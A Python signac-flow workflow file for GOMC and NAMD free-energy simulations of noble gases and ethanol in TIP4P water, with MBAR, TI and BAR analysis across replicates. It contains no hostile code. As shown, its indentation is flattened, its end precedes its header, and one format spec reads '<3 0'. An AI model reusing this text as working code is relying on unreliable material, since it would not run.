print("Started: equilb NPT or GEMC-NVT GOMC control file writing")
print("#**********************")
for initial_state_sims_i in list(job.doc.InitialState_list):
namd_restart_pdb_psf_file_name_str = mosdef_structure_box_0_name_str
restart_control_file_name_str = namd_equilb_NPT_control_file_name_str
output_name_control_file_name = "{}_initial_state_{}".format(
gomc_equilb_design_ensemble_control_file_name_str, initial_state_sims_i
)
job.doc.gomc_equilb_design_ensemble_dict.update(
{
initial_state_sims_i: {
"restart_control_file_name": restart_control_file_name_str,
"output_name_control_file_name": output_name_control_file_name,
}
}
)
# calc MC steps
MC_steps = int(gomc_steps_equilb_design_ensemble)
EqSteps = 1000
# output all data and calc frequecy
output_true_list_input = [
True,
int(gomc_output_data_every_X_steps),
]
output_false_list_input = [
False,
int(gomc_output_data_every_X_steps),
]
if job.doc.solvent in ["TIP4", "TIP3"] \
and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
used_ensemble = "NPT"
if job.doc.production_ensemble in ["NVT", "NPT"]:
VolFreq = (0.01,)
MultiParticleFreq = (None,)
IntraSwapFreq = (0.0,)
CrankShaftFreq = (None,)
SwapFreq = (None,)
DisFreq = (0.39,)
RotFreq = (0.3,)
RegrowthFreq = (0.3,)
else:
raise ValueError(
"Moleules MC move ratios not listed for this solvent and solute or ensemble "
"in the GOMC control file writer."
)
Coordinates_box_0 = "{}.pdb".format(
namd_restart_pdb_psf_file_name_str
)
Structure_box_0 = "{}.psf".format(
namd_restart_pdb_psf_file_name_str
)
binCoordinates_box_0 = "{}.restart.coor".format(
restart_control_file_name_str
)
extendedSystem_box_0 = "{}.restart.xsc".format(
restart_control_file_name_str
)
gomc_control.write_gomc_control_file(
gomc_charmm_object_with_files,
output_name_control_file_name,
used_ensemble,
MC_steps,
production_temperature_K,
ff_psf_pdb_file_directory=None,
check_input_files_exist=False,
Parameters="{}.inp".format(gomc_ff_filename_str),
Restart=True,
RestartCheckpoint=True,
ExpertMode=False,
Coordinates_box_0=Coordinates_box_0,
Structure_box_0=Structure_box_0,
binCoordinates_box_0=binCoordinates_box_0,
extendedSystem_box_0=extendedSystem_box_0,
binVelocities_box_0=None,
Coordinates_box_1=None,
Structure_box_1=None,
binCoordinates_box_1=None,
extendedSystem_box_1=None,
binVelocities_box_1=None,
input_variables_dict={
"PRNG": seed_no,
"Pressure": production_pressure_bar,
"Ewald": use_ElectroStatics,
"ElectroStatic": use_ElectroStatics,
"VDWGeometricSigma": VDWGeometricSigma,
"Rcut": job.doc.Rcut_ang,
"Exclude": Exclude,
"VolFreq": VolFreq[-1],
"MultiParticleFreq": MultiParticleFreq[-1],
"IntraSwapFreq": IntraSwapFreq[-1],
"CrankShaftFreq": CrankShaftFreq[-1],
"SwapFreq": SwapFreq[-1],
"DisFreq": DisFreq[-1],
"RotFreq": RotFreq[-1],
"RegrowthFreq": RegrowthFreq[-1],
"OutputName": output_name_control_file_name,
"EqSteps": EqSteps,
"PressureCalc": output_false_list_input,
"RestartFreq": output_true_list_input,
"CheckpointFreq": output_true_list_input,
"ConsoleFreq": output_true_list_input,
"BlockAverageFreq": output_true_list_input,
"HistogramFreq": output_false_list_input,
"CoordinatesFreq": output_false_list_input,
"DCDFreq": output_true_list_input,
"Potential": cutoff_style,
"LRC": True,
"RcutLow": 0,
"CBMC_First": 12,
"CBMC_Nth": 10,
"CBMC_Ang": 50,
"CBMC_Dih": 50,
"FreeEnergyCalc": FreeEnergyCalc,
"MoleculeType": MoleculeType,
"InitialState": initial_state_sims_i,
"LambdaVDW": list(job.doc.LambdaVDW_list),
# "LambdaCoulomb": None,
},
)
print("#**********************")
print("Completed: equilb NPT or GEMC-NVT GOMC control file writing")
print("#**********************")
# ******************************************************
# equilb selected_ensemble, if NVT -> NPT - GOMC control file writing (end)
# Note: the control files are written for the max number of gomc_equilb_design_ensemble runs
# so the Charmm object only needs created 1 time.
# ******************************************************
# ******************************************************
# production NPT or GEMC-NVT - GOMC control file writing (start)
# ******************************************************
print("#**********************")
print("Started: production NPT or GEMC-NVT GOMC control file writing")
print("#**********************")
output_name_control_file_name = "{}_initial_state_{}".format(
gomc_production_control_file_name_str, initial_state_sims_i
)
restart_control_file_name_str = "{}_initial_state_{}".format(
gomc_equilb_design_ensemble_control_file_name_str, int(initial_state_sims_i)
)
job.doc.gomc_production_run_ensemble_dict.update(
{
initial_state_sims_i: {
"restart_control_file_name": restart_control_file_name_str,
"output_name_control_file_name": output_name_control_file_name,
}
}
)
# calc MC steps
MC_steps = int(gomc_steps_lamda_production)
EqSteps = 1000
# output all data and calc frequecy
output_true_list_input = [
True,
int(gomc_output_data_every_X_steps),
]
output_false_list_input = [
False,
int(gomc_output_data_every_X_steps),
]
if job.doc.solvent in ["TIP4", "TIP3"] \
and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
used_ensemble = job.doc.production_ensemble
if job.doc.production_ensemble in ["NVT", "NPT"]:
if job.doc.production_ensemble in ["NVT"]:
VolFreq = (0.00,)
MultiParticleFreq = (None,)
IntraSwapFreq = (0.0,)
CrankShaftFreq = (None,)
SwapFreq = (None,)
DisFreq = (0.4,)
RotFreq = (0.3,)
RegrowthFreq = (0.3,)
elif job.doc.production_ensemble in ["NPT"]:
VolFreq = (0.01,)
MultiParticleFreq = (None,)
IntraSwapFreq = (0.0,)
CrankShaftFreq = (None,)
SwapFreq = (None,)
DisFreq = (0.39,)
RotFreq = (0.3,)
RegrowthFreq = (0.3,)
else:
raise ValueError(
"Moleules MC move ratios not listed for this solvent and solute or ensemble "
"in the GOMC control file writer."
)
Coordinates_box_0 = "{}_BOX_0_restart.pdb".format(
restart_control_file_name_str
)
Structure_box_0 = "{}_BOX_0_restart.psf".format(
restart_control_file_name_str
)
binCoordinates_box_0 = "{}_BOX_0_restart.coor".format(
restart_control_file_name_str
)
extendedSystem_box_0 = "{}_BOX_0_restart.xsc".format(
restart_control_file_name_str
)
gomc_control.write_gomc_control_file(
gomc_charmm_object_with_files,
output_name_control_file_name,
used_ensemble,
MC_steps,
production_temperature_K,
ff_psf_pdb_file_directory=None,
check_input_files_exist=False,
Parameters="{}.inp".format(gomc_ff_filename_str),
Restart=True,
RestartCheckpoint=True,
ExpertMode=False,
Coordinates_box_0=Coordinates_box_0,
Structure_box_0=Structure_box_0,
binCoordinates_box_0=binCoordinates_box_0,
extendedSystem_box_0=extendedSystem_box_0,
binVelocities_box_0=None,
Coordinates_box_1=None,
Structure_box_1=None,
binCoordinates_box_1=None,
extendedSystem_box_1=None,
binVelocities_box_1=None,
input_variables_dict={
"PRNG": seed_no,
"Pressure": production_pressure_bar,
"Ewald": use_ElectroStatics,
"ElectroStatic": use_ElectroStatics,
"VDWGeometricSigma": VDWGeometricSigma,
"Rcut": job.doc.Rcut_ang,
"Exclude": Exclude,
"VolFreq": VolFreq[-1],
"MultiParticleFreq": MultiParticleFreq[-1],
"IntraSwapFreq": IntraSwapFreq[-1],
"CrankShaftFreq": CrankShaftFreq[-1],
"SwapFreq": SwapFreq[-1],
"DisFreq": DisFreq[-1],
"RotFreq": RotFreq[-1],
"RegrowthFreq": RegrowthFreq[-1],
"OutputName": output_name_control_file_name,
"EqSteps": EqSteps,
"PressureCalc": output_false_list_input,
"RestartFreq": output_true_list_input,
"CheckpointFreq": output_true_list_input,
"ConsoleFreq": output_true_list_input,
"BlockAverageFreq": output_true_list_input,
"HistogramFreq": output_false_list_input,
"CoordinatesFreq": output_false_list_input,
"DCDFreq": output_true_list_input,
"Potential": cutoff_style,
"LRC": True,
"RcutLow": 0,
"CBMC_First": 12,
"CBMC_Nth": 10,
"CBMC_Ang": 50,
"CBMC_Dih": 50,
"FreeEnergyCalc": FreeEnergyCalc,
"MoleculeType": MoleculeType,
"InitialState": initial_state_sims_i,
"LambdaVDW": list(job.doc.LambdaVDW_list),
#"LambdaCoulomb": None,
},
)
print("#**********************")
print("Completed: production NPT or GEMC-NVT GOMC control file writing")
print("#**********************")
# ******************************************************
# production NPT or GEMC-NVT - GOMC control file writing (end)
# ******************************************************
# ******************************************************
# ******************************************************
# Creating GOMC files (pdb, psf, force field (FF), and gomc control files (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# namd_equilb_NPT -starting the NAMD simulations (start)
# ******************************************************
# ******************************************************
@Project.pre(mosdef_input_written)
@Project.pre(part_2a_namd_equilb_NPT_control_file_written)
@Project.post(part_3a_output_namd_equilb_NPT_started)
@Project.post(part_4a_job_namd_equilb_NPT_completed_properly)
@Project.operation.with_directives(
{
"np": lambda job: job.doc.namd_node_ncpu,
"ngpu": lambda job: job.doc.namd_node_ngpu,
"memory": memory_needed,
"walltime": walltime_namd_hr,
}
)
@flow.with_job
@flow.cmd
def run_namd_equilb_NPT_gomc_command(job):
"""Run the namd_equilb_NPT simulation."""
print("#**********************")
print("# Started the run_namd_equilb_NPT_gomc_command.")
print("#**********************")
control_file_name_str = namd_equilb_NPT_control_file_name_str
print(f"Running simulation job id {job}")
run_command = "{}/{} +p{} {}.conf > out_{}.dat".format(
str(namd_binary_path),
str(job.doc.namd_equilb_NPT_gomc_binary_file),
str(job.doc.namd_node_ncpu),
str(control_file_name_str),
str(control_file_name_str),
)
print('namd run_command = ' + str(run_command))
return run_command
# ******************************************************
# ******************************************************
# namd_equilb_NPT -starting the NAMD simulations (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# equilb NPT - starting the GOMC simulation (start)
# ******************************************************
# ******************************************************
for initial_state_j in range(0, number_of_lambda_spacing_including_zero_int):
@Project.pre(part_2a_namd_equilb_NPT_control_file_written)
@Project.pre(part_4a_job_namd_equilb_NPT_completed_properly)
@Project.post(part_3b_output_gomc_equilb_design_ensemble_started)
@Project.post(part_4b_job_gomc_equilb_design_ensemble_completed_properly)
@Project.operation.with_directives(
{
"np": lambda job: job.doc.gomc_ncpu,
"ngpu": lambda job: job.doc.gomc_ngpu,
"memory": memory_needed,
"walltime": walltime_gomc_equilbrium_hr,
},
name = f"gomc_equilb_design_ensemble_initial_state_{initial_state_j}"
)
@flow.with_job
@flow.cmd
def run_equilb_run_gomc_command(job, *, initial_state_j=initial_state_j):
"""Run the gomc_equilb_run_ensemble simulation."""
control_file_name_str = job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_j)
]["output_name_control_file_name"]
print(f"Running simulation job id {job}")
run_command = "{}/{} +p{} {}.conf > out_{}.dat".format(
str(gomc_binary_path),
str(job.doc.gomc_equilb_design_ensemble_gomc_binary_file),
str(job.doc.gomc_ncpu),
str(control_file_name_str),
str(control_file_name_str),
)
print('gomc equilbrium_run run_command = ' + str(run_command))
return run_command
# *****************************************
# ******************************************************
# equilb NPT - starting the GOMC simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# production run - starting the GOMC simulation (start)
# ******************************************************
# ******************************************************
for initial_state_i in range(0, number_of_lambda_spacing_including_zero_int):
@Project.pre(part_2c_gomc_production_control_file_written)
@Project.pre(part_4b_job_gomc_equilb_design_ensemble_completed_properly)
@Project.post(part_part_3c_output_gomc_production_run_started)
@Project.post(part_4c_job_production_run_completed_properly)
@Project.operation.with_directives(
{
"np": lambda job: job.doc.gomc_ncpu,
"ngpu": lambda job: job.doc.gomc_ngpu,
"memory": memory_needed,
"walltime": walltime_gomc_production_hr,
},
name = f"gomc_production_ensemble_initial_state_{initial_state_i}"
)
@flow.with_job
@flow.cmd
def run_production_run_gomc_command(job, *, initial_state_i=initial_state_i):
"""Run the gomc_production_ensemble simulation."""
control_file_name_str = job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
print(f"Running simulation job id {job}")
run_command = "{}/{} +p{} {}.conf > out_{}.dat".format(
str(gomc_binary_path),
str(job.doc.gomc_production_ensemble_gomc_binary_file),
str(job.doc.gomc_ncpu),
str(control_file_name_str),
str(control_file_name_str),
)
print('gomc production run_command = ' + str(run_command))
return run_command
# ******************************************************
# ******************************************************
# production run - starting the GOMC simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# data analysis - get the average data from each individual simulation (start)
# ******************************************************
# ******************************************************
@Project.operation.with_directives(
{
"np": 1,
"ngpu": 0,
"memory": memory_needed,
"walltime": walltime_gomc_analysis_hr,
}
)
@FlowProject.pre(
lambda *jobs: all(
part_4c_job_production_run_completed_properly(job)
for job in jobs
)
)
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.post(part_5a_analysis_individual_simulation_averages_completed)
@flow.with_job
def part_5a_analysis_individual_simulation_averages(*jobs):
# remove the total averaged replicate data and all analysis data after this,
# as it is no longer valid when adding more simulations
if os.path.isfile(f'../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}'):
os.remove(f'../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}')
output_column_temp_title = 'temp_K' # column title title for temp
output_column_solute_title = 'solute' # column title title for temp
output_column_dFE_MBAR_title = 'dFE_MBAR_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_MBAR_std_title = 'dFE_MBAR_std_kcal_per_mol' # column title title for ds_MBAR
output_column_dFE_TI_title = 'dFE_TI_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_TI_std_title = 'dFE_TI_std_kcal_per_mol' # column title title for ds_MBAR
output_column_dFE_BAR_title = 'dFE_BAR_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_BAR_std_title = 'dFE_BAR_std_kcal_per_mol' # column title title for ds_MBAR
# get the averages from each individual simulation and write the csv's.
for job in jobs:
files = []
k_b = 1.9872036E-3 # kcal/mol/K
temperature = job.sp.production_temperature_K
k_b_T = temperature * k_b
for initial_state_iter in range(0, number_of_lambda_spacing_including_zero_int):
reading_filename_box_0_iter = f'Free_Energy_BOX_0_{gomc_production_control_file_name_str}_' \
f'initial_state_{initial_state_iter}.dat'
files.append(reading_filename_box_0_iter)
# for TI estimator
dHdl = pd.concat([extract_dHdl(job.fn(f), T=temperature) for f in files])
ti = TI().fit(dHdl)
delta_ti, delta_std_ti = get_delta_TI_or_MBAR(ti, k_b_T)
# for MBAR estimator
u_nk = pd.concat([extract_u_nk(job.fn(f), T=temperature) for f in files])
mbar = MBAR().fit(u_nk)
delta_mbar, delta_std_mbar = get_delta_TI_or_MBAR(mbar, k_b_T)
# for BAR estimator
bar = BAR().fit(u_nk)
delta_bar, delta_std_bar = get_delta_BAR(bar, k_b_T)
# write the data out in each job
box_0_replicate_data_txt_file = open(job.fn(output_replicate_txt_file_name_box_0), "w")
box_0_replicate_data_txt_file.write(
f"{output_column_temp_title: <30} "
f"{output_column_solute_title: <30} "
f"{output_column_dFE_MBAR_title: <30} "
f"{output_column_dFE_MBAR_std_title: <30} "
f"{output_column_dFE_TI_title: <30} "
f"{output_column_dFE_TI_std_title: <30} "
f"{output_column_dFE_BAR_title: <30} "
f"{output_column_dFE_BAR_std_title: <30} "
f" \n"
)
box_0_replicate_data_txt_file.write(
f"{job.sp.production_temperature_K: <30} "
f"{job.sp.solute: <30} "
f"{delta_mbar: <30} "
f"{delta_std_mbar: <30} "
f"{delta_ti: <30} "
f"{delta_std_ti: <30} "
f"{delta_bar: <30} "
f"{delta_std_bar: <30} "
f" \n"
)
# ******************************************************
# ******************************************************
# data analysis - get the average data from each individual simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# data analysis - get the average and std. dev. from/across all the replicates (start)
# ******************************************************
# ******************************************************
@aggregator.groupby(key=statepoint_without_replica,
sort_by="production_temperature_K",
sort_ascending=True
)
@Project.operation.with_directives(
{
"np": 1,
"ngpu": 0,
"memory": memory_needed,
"walltime": walltime_gomc_analysis_hr,
}
)
@Project.pre(lambda *jobs: all(part_5a_analysis_individual_simulation_averages_completed(j)
for j in jobs[0]._project))
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.pre(part_5a_analysis_individual_simulation_averages_completed)
@Project.post(part_5b_analysis_replica_averages_completed)
def part_5b_analysis_replica_averages(*jobs):
# ***************************************************
# create the required lists and file labels for the replicates (start)
# ***************************************************
# output and labels
output_column_temp_title = 'temp_K' # column title title for temp
output_column_temp_std_title = 'temp_std_K' # column title title for temp
output_column_solute_title = 'solute' # column title title for temp
output_column_dFE_MBAR_title = 'dFE_MBAR_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_MBAR_std_title = 'dFE_MBAR_std_kcal_per_mol' # column title title for ds_MBAR
output_column_dFE_TI_title = 'dFE_TI_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_TI_std_title = 'dFE_TI_std_kcal_per_mol' # column title title for ds_MBAR
output_column_dFE_BAR_title = 'dFE_BAR_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_BAR_std_title = 'dFE_BAR_std_kcal_per_mol' # column title title for ds_MBAR
# get the list used in this function
temp_repilcate_list = []
solute_repilcate_list = []
delta_MBAR_repilcate_box_0_list = []
delta_TI_repilcate_box_0_list = []
delta_BAR_repilcate_box_0_list = []
output_txt_file_header = f"{output_column_temp_title: <30} " \
f"{output_column_temp_std_title: <30} " \
f"{output_column_solute_title: <30} "\
f"{output_column_dFE_MBAR_title: <30} "\
f"{output_column_dFE_MBAR_std_title: <30} "\
f"{output_column_dFE_TI_title: <3 0} "\
f"{output_column_dFE_TI_std_title: <30} "\
f"{output_column_dFE_BAR_title: <30} "\
f"{output_column_dFE_BAR_std_title: <30} "\
f"\n"
write_file_path_and_name_box_0 = f'analysis/{output_avg_std_of_replicates_txt_file_name_box_0}'
if os.path.isfile(write_file_path_and_name_box_0):
box_box_0_data_txt_file = open(write_file_path_and_name_box_0, "a")
else:
box_box_0_data_txt_file = open(write_file_path_and_name_box_0, "w")
box_box_0_data_txt_file.write(output_txt_file_header)
# ***************************************************
# create the required lists and file labels for the replicates (end)
# ***************************************************
for job in jobs:
# *************************
# drawing in data from single file and extracting specific rows from box 0 (start)
# *************************
reading_file_box_box_0 = job.fn(output_replicate_txt_file_name_box_0)
data_box_box_0 = pd.read_csv(reading_file_box_box_0, sep='\s+', header=0, na_values='NaN', index_col=False)
data_box_box_0 = pd.DataFrame(data_box_box_0)
temp_repilcate_list.append(data_box_box_0.loc[:, output_column_temp_title][0])
solute_repilcate_list.append(data_box_box_0.loc[:, output_column_solute_title][0])
delta_MBAR_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_MBAR_title][0])
delta_TI_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_TI_title][0])
delta_BAR_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_BAR_title][0])
# *************************
# drawing in data from single file and extracting specific rows from box 0 (end)
# *************************
# *************************
# get the replica means and std.devs (start)
# *************************
temp_mean = np.mean(temp_repilcate_list)
temp_std = np.std(temp_repilcate_list, ddof=1)
solute_iter = solute_repilcate_list[0]
delta_MBAR_mean_box_box_0 = np.mean(delta_MBAR_repilcate_box_0_list)
delta_TI_mean_box_box_0 = np.mean(delta_TI_repilcate_box_0_list)
delta_BAR_mean_box_box_0 = np.mean(delta_BAR_repilcate_box_0_list)
delta_std_MBAR_mean_box_box_0 = np.std(delta_MBAR_repilcate_box_0_list, ddof=1)
delta_std_TI_mean_box_box_0 = np.std(delta_TI_repilcate_box_0_list, ddof=1)
delta_std_BAR_mean_box_box_0 = np.std(delta_BAR_repilcate_box_0_list, ddof=1)
# *************************
# get the replica means and std.devs (end)
# *************************
# ************************************
# write the analysis data files for the liquid and vapor boxes (start)
# ************************************
box_box_0_data_txt_file.write(
f"{temp_mean: <30} "
f"{temp_std: <30} "
f"{solute_iter: <30} "
f"{delta_MBAR_mean_box_box_0: <30} "
f"{delta_std_MBAR_mean_box_box_0: <30} "
f"{delta_TI_mean_box_box_0: <30} "
f"{delta_std_TI_mean_box_box_0: <30} "
f"{delta_BAR_mean_box_box_0: <30} "
f"{delta_std_BAR_mean_box_box_0: <30} "
f" \n"
)
# ************************************
# write the analysis data files for the liquid and vapor boxes (end)
# ************************************
# ******************************************************
# ******************************************************
# data analysis - get the average and std. dev. from/across all the replicates (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# signac end code (start)
# ******************************************************
# ******************************************************
if __name__ == "__main__":
pr = Project()
pr.main()
# ******************************************************
# ******************************************************
# signac end code (end)
# ******************************************************
# ******************************************************
| """GOMC's setup for signac, signac-flow, signac-dashboard for this study."""
# project.py
import flow
# from flow.environment import StandardEnvironment
import mbuild as mb
import mbuild.formats.charmm_writer as mf_charmm
import mbuild.formats.gomc_conf_writer as gomc_control
import numpy as np
from alchemlyb.parsing.gomc import extract_dHdl, extract_u_nk
from alchemlyb.estimators import MBAR, BAR, TI
import alchemlyb.preprocessing.subsampling as ss
import pandas as pd
import numpy as np
import os
import unyt as u
from flow import FlowProject, aggregator
from flow.environment import DefaultSlurmEnvironment
from src.utils.forcefields import get_ff_path
from src.utils.forcefields import get_molecule_path
from templates.NAMD_conf_template import generate_namd_equilb_control_file
class Project(FlowProject):
"""Subclass of FlowProject to provide custom methods and attributes."""
def __init__(self):
super().__init__()
class Grid(DefaultSlurmEnvironment): # Grid(StandardEnvironment):
"""Subclass of DefaultSlurmEnvironment for WSU's Grid cluster."""
hostname_pattern = r".*\.grid\.wayne\.edu"
template = "grid.sh"
# ******************************************************
# users typical variables, but not all (start)
# ******************************************************
# set binary path to gomc binary files (the bin folder).
# If the gomc binary files are callable directly from the terminal without a path,
# please just enter and empty string (i.e., "" or '')
# WSU grid binary paths
gomc_binary_path = "/wsu/home/go/go24/go2432/wolf/GOMC/bin"
namd_binary_path = "/wsu/home/go/go24/go2432/NAMD_2.14_Linux-x86_64-multicore-CUDA"
# brads workstation binary paths
#gomc_binary_path = "/home/brad/Programs/GOMC/GOMC_dev_1_21_22/bin"
#namd_binary_path = "/home/brad/Programs/NAMD/NAMD_2.14_RTX_3080_build_Source_CUDA"
# number of simulation steps
gomc_steps_equilb_design_ensemble = 10 * 10**6 # set value for paper = 10 * 10**6
gomc_steps_lamda_production = 50 * 10**6 # set value for paper = 50 * 10**6
gomc_output_data_every_X_steps = 100 * 10**3 # set value for paper = 100 * 10**3
gomc_free_energy_output_data_every_X_steps = 10 * 10**3 # set value for paper = 10 * 10**3
# Free energy calcs: set free energy data in doc
# this number will generate the lamdas
# set the number of lambda spacings, which includes 0 to 1
number_of_lambda_spacing_including_zero_int = 11
# force field (FF) file for all simulations in that job
# Note: do not add extensions
namd_ff_filename_str = "in_namd_FF"
gomc_ff_filename_str = "in_gomc_FF"
# initial mosdef structure and coordinates
# Note: do not add extensions
mosdef_structure_box_0_name_str = "mosdef_box_0"
# melt equilb simulation runs GOMC control file input and simulation outputs
# Note: do not add extensions
namd_equilb_NPT_control_file_name_str = "namd_equilb_NPT"
# The equilb using the ensemble used for the simulation design, which
# includes the simulation runs GOMC control file input and simulation outputs
# Note: do not add extensions
gomc_equilb_design_ensemble_control_file_name_str = "gomc_equilb_design_ensemble"
# The production run using the ensemble used for the simulation design, which
# includes the simulation runs GOMC control file input and simulation outputs
# Note: do not add extensions
gomc_production_control_file_name_str = "gomc_production_run"
# Analysis (each replicates averages):
# Output text (txt) file names for each replicates averages
# directly put in each replicate folder (.txt, .dat, etc)
output_replicate_txt_file_name_box_0 = "analysis_avg_data_box_0.txt"
# Analysis (averages and std. devs. of # all the replcates):
# Output text (txt) file names for the averages and std. devs. of all the replcates,
# including the extention (.txt, .dat, etc)
output_avg_std_of_replicates_txt_file_name_box_0 = "analysis_avg_std_of_replicates_box_0.txt"
walltime_mosdef_hr = 24
walltime_namd_hr = 24
walltime_gomc_equilbrium_hr = 72
walltime_gomc_production_hr = 368
walltime_gomc_analysis_hr = 4
memory_needed = 16
# forcefield names dict
forcefield_residue_to_ff_filename_dict = {
"TIP4": "tip4p_2005.xml",
"Ne": "nobel_gas_vrabec_LB_mixing.xml",
"Rn": "nobel_gas_vrabec_LB_mixing.xml",
"ETOH": "trappe-ua.xml",
}
# smiles of mol2 file input a .mol2 file or smiles as a string
smiles_or_mol2_name_to_value_dict = {
"TIP4": 'tip4p.mol2',
"Ne": "Ne",
"Rn": "Rn",
"ETOH": "ethanol.mol2"
}
# get the paths to the smiles or mol2 files
smiles_or_mol2 = {}
for smiles_or_mol2_iter_i in list(smiles_or_mol2_name_to_value_dict.keys()):
smiles_or_mol2.update(
{str(smiles_or_mol2_iter_i):
{"use_smiles": get_molecule_path(
str(smiles_or_mol2_name_to_value_dict[str(smiles_or_mol2_iter_i)]))[0],
"smiles_or_mol2": get_molecule_path(
str(smiles_or_mol2_name_to_value_dict[str(smiles_or_mol2_iter_i)]))[1],
}
}
)
# get the paths to the FF xmls
forcefield_dict = {}
for forcefield_dict_iter_i in list(forcefield_residue_to_ff_filename_dict.keys()):
forcefield_dict.update(
{str(forcefield_dict_iter_i): get_ff_path(
forcefield_residue_to_ff_filename_dict[str(forcefield_dict_iter_i)])
}
)
print("*********************")
print("*********************")
print("smiles_or_mol2 = " +str(smiles_or_mol2))
print("forcefield_dict = " +str(forcefield_dict))
print("*********************")
print("*********************")
# ******************************************************
# users typical variables, but not all (end)
# ******************************************************
# ******************************************************
# signac and GOMC-MOSDEF code (start)
# ******************************************************
# ******************************************************
# ******************************************************
# create some initial variable to be store in each jobs
# directory in an additional json file, and test
# to see if they are written (start).
# ******************************************************
# ******************************************************
# set the default directory
project_directory_path = str(os.getcwd())
print("project_directory_path = " +str(project_directory_path))
# ******************************************************
# ******************************************************
# functions for selecting/grouping/aggregating in different ways (start)
# ******************************************************
# ******************************************************
def statepoint_without_replica(job):
keys = sorted(tuple(i for i in job.sp.keys() if i not in {"replica_number_int"}))
return [(key, job.sp[key]) for key in keys]
def statepoint_without_temperature(job):
keys = sorted(tuple(i for i in job.sp.keys() if i not in {"production_temperature_K"}))
return [(key, job.sp[key]) for key in keys]
# ******************************************************
# ******************************************************
# functions for selecting/grouping/aggregating in different ways (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# functions for free energy calcs MBAR, TI, and BAR for getting delta free energy and delta error (start)
# ******************************************************
# ******************************************************
def get_delta_TI_or_MBAR(TI_or_MBAR_estimate, k_b_T):
""" Return the change in free energy and standard deviation for the MBAR and TI estimates.
"""
delta = TI_or_MBAR_estimate.delta_f_.iloc[0, -1] * k_b_T
std_delta = TI_or_MBAR_estimate.d_delta_f_.iloc[0, -1] * k_b_T
return delta, std_delta
def get_delta_BAR(BAR_estimate, k_b_T):
""" Return the change in free energy and standard deviation for the BAR estimates.
"""
error_estimate = 0.0
for i in range(len(BAR_estimate.d_delta_f_) - 1):
error_estimate += BAR_estimate.d_delta_f_.values[i][i + 1] ** 2
delta = BAR_estimate.delta_f_.iloc[0, -1] * k_b_T
std_delta = k_b_T * error_estimate ** 0.5
return delta, std_delta
# ******************************************************
# ******************************************************
# functions for free energy calcs MBAR, TI, and BAR for getting delta free energy and delta error (end)
# ******************************************************
# ******************************************************
@Project.label
def part_1a_initial_data_input_to_json(job):
"""Check that the initial job data is written to the json files."""
data_written_bool = False
if job.isfile(f"{'signac_job_document.json'}"):
data_written_bool = True
return data_written_bool
@Project.post(part_1a_initial_data_input_to_json)
@Project.operation.with_directives(
{
"np": 1,
"ngpu": 0,
"memory": memory_needed,
"walltime": walltime_mosdef_hr,
}
)
@flow.with_job
def initial_parameters(job):
"""Set the initial job parameters into the jobs doc json file."""
# select
# set free energy data in doc
# Free energy calcs
# lamda generator
LambdaVDW_list = []
InitialState_list = []
for lamda_i in range(0, int(number_of_lambda_spacing_including_zero_int)):
lambda_space_increments = 1 / int(number_of_lambda_spacing_including_zero_int - 1)
LambdaVDW_list.append(np.round(lamda_i * lambda_space_increments, decimals=8))
InitialState_list.append(lamda_i)
print("*********************")
print("*********************")
print("LambdaVDW_list = " + str(LambdaVDW_list))
print("InitialState_list = " + str(InitialState_list))
print("*********************")
print("*********************")
if LambdaVDW_list[0] != 0 and LambdaVDW_list[-1] != 1 :
raise ValueError("ERROR: The selected lambda list values do not start with a 0 and end 1.")
job.doc.LambdaVDW_list = LambdaVDW_list
job.doc.InitialState_list = InitialState_list
# set the GOMC production ensemble temp, pressure, molecule, box dimenstion and residue names
job.doc.production_ensemble = "NVT"
job.doc.production_pressure_bar = (1 * u.atm).to('bar')
job.doc.production_temperature_K = job.sp.production_temperature_K
job.doc.N_liquid_solvent = 1000
job.doc.N_liquid_solute = 1
job.doc.liq_box_lengths_ang = 31.07 * u.angstrom
job.doc.Rcut_ang = 15 * u.angstrom # this is the Rcut for GOMC it is the Rswitch for NAMD
job.doc.Rcut_for_switch_namd_ang = 17 * u.angstrom # Switch Rcut for NAMD's Switch function
job.doc.neighbor_list_dist_namd_ang = 22 * u.angstrom # NAMD's neighbor list
# list replica seed numbers
replica_no_to_seed_dict = {
0: 0,
1: 1,
2: 2,
3: 3,
4: 4,
5: 5,
6: 6,
7: 7,
8: 8,
9: 9,
10: 10,
11: 11,
12: 12,
13: 13,
14: 14,
15: 15,
16: 16,
17: 17,
18: 18,
19: 19,
20: 20,
}
job.doc.replica_number_int = replica_no_to_seed_dict.get(
int(job.sp.replica_number_int)
)
# set solvent and solute in doc
job.doc.solvent = "TIP4"
job.doc.solute = job.sp.solute
# set rcut, ewalds
if job.doc.solvent in ["TIP4", "TIP3"] and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
job.doc.namd_node_ncpu = 1
job.doc.namd_node_ngpu = 1
job.doc.gomc_ncpu = 1 # 1 is optimal but I want data quick. run time is set for 1 cpu
job.doc.gomc_ngpu = 1
else:
raise ValueError(
"ERROR: The solvent and solute do are not set up to selected the mixing rules or electrostatics "
)
# get the namd binary paths
if job.doc.namd_node_ngpu == 0:
job.doc.namd_cpu_or_gpu = "CPU"
